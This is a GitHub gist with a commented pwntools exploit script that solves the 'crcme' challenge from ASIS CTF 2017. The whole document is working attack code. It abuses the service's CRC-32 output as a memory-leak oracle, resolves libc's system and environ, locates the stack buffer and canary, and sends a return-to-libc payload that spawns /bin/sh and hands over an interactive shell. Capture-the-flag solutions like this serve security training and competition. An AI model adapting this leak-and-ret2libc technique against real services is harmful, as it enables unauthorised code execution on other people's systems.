@kokjo
Last active June 3, 2019 15:52
Solution to the CRC problem from ASIS CTF 2017
from pwn import *
# Precompute the CRC-32 reverse lookup for every possible 2-byte value.
# Each leak below turns the CRC reported by the service back into the two
# bytes that produced it, so the whole 16-bit input space is tabulated once.
s = log.waitfor("Calculating CRC reverse lookup table")
reverse_crc = {}
for value in range(2**16):
    chunk = p16(value)
    reverse_crc[crc.crc_32(chunk)] = chunk
s.success()

# Target binary: parsed with ELF() for DynELF's symbol resolution later, and
# spawned as the process the rest of the script talks to.
e = ELF("./crcme_8416479dcf3a74133080df4f454cd0f76ec9cc8d")
r = process("./crcme_8416479dcf3a74133080df4f454cd0f76ec9cc8d")
@MemLeak
def leak(addr):
    """Leak two bytes of process memory at *addr* through the CRC oracle.

    The service is asked to checksum a length-2 region; the address of that
    region appears to be taken from the last four bytes of the payload
    (inferred from the `2` sent as length and the 2-byte lookup table —
    TODO confirm against the binary).  The reported CRC-32 is mapped back
    to the original bytes via ``reverse_crc``.  Wrapped in ``MemLeak`` so
    the ``leak.d()`` dword helper is available to the rest of the script.
    """
    f = 0
    # The payload goes out via sendline(), so an address byte of 0x0a would
    # cut the input short.  Leak from one byte lower instead and drop the
    # extra leading byte from the result (f == 1) so the caller still gets
    # the bytes starting at the address it asked for.
    if "\n" in p32(addr):
        log.info("Leaking address with newline: 0x%x", addr)
        addr -= 1
        f = 1
    #Choice:
    r.sendline("1")
    #What is the length of your data:
    r.sendline("2")
    #Please send me 1 bytes to process:
    # "/bin/sh\x00" is placed at the start of the buffer so its stack address
    # can be recovered later; the rest of the 100-byte prefix is 'A' padding
    # (the 0x41414141 marker the stack scan below looks for).
    r.sendline("/bin/sh\x00".ljust(100, "A") + p32(addr))
    r.recvuntil("CRC is: ")
    # NOTE: this local `crc` shadows the pwnlib `crc` module used at module
    # level; harmless here because the module is not used in this function.
    crc = int(r.recvline(), 16)
    # reverse_crc maps a CRC-32 back to the 2-byte input that produced it.
    return reverse_crc[crc][f:]
# Resolve libc symbols through the leak primitive alone (no libc copy is
# assumed): DynELF reads the loaded ELF structures via leak().
d = DynELF(leak, elf=e)
system = d.lookup("system", lib="libc.so")
log.info("system = 0x%x", system)
environ = d.lookup("environ", lib="libc.so")
log.info("environ = 0x%x", environ)
# libc's `environ` holds a pointer into the stack.  Starting there, scan
# downward for the 0x41414141 ('AAAA') padding left by the leak payload to
# find the input buffer's location on the stack.
stack = leak.d(environ)
for i in range(0x400):
    if leak.d(stack-i) == 0x41414141: break
# NOTE(review): if no marker is found within 0x400 bytes, `i` is simply 0x3ff
# here and the script continues with a meaningless `stack` value; there is no
# for/else or error check.
stack = stack - i
log.info("stack = 0x%x", stack)
# Presumably the stack-protector canary, read from just past the buffer (the
# final payload places the same value after 40 bytes of filler) — TODO confirm
# against the binary's frame layout.
cookie = leak.d(stack+8)
log.info("cookie = 0x%x", cookie)
# Scanning downward from environ should hit the highest-address 'AAAA' dword
# of the 100-byte prefix first (offset 96), so stack - 100 + 4 is the start of
# the buffer, where "/bin/sh\x00" was written by the leak payload.
binsh = stack-100+4
# 32-bit return-to-libc frame: filler, the leaked canary, 12 more filler bytes,
# then system() with a dummy return address and the "/bin/sh" pointer as its
# argument.
rop = flat(["A"*40, cookie, "B"*12, system, 0x41414141, binsh])
# sendline() would truncate the payload at a newline byte.
assert "\n" not in rop
r.sendline(rop)
# Confirm a shell actually came up before handing the terminal to the user.
r.sendline("echo SHELL")
r.recvuntil("SHELL\n")
r.interactive()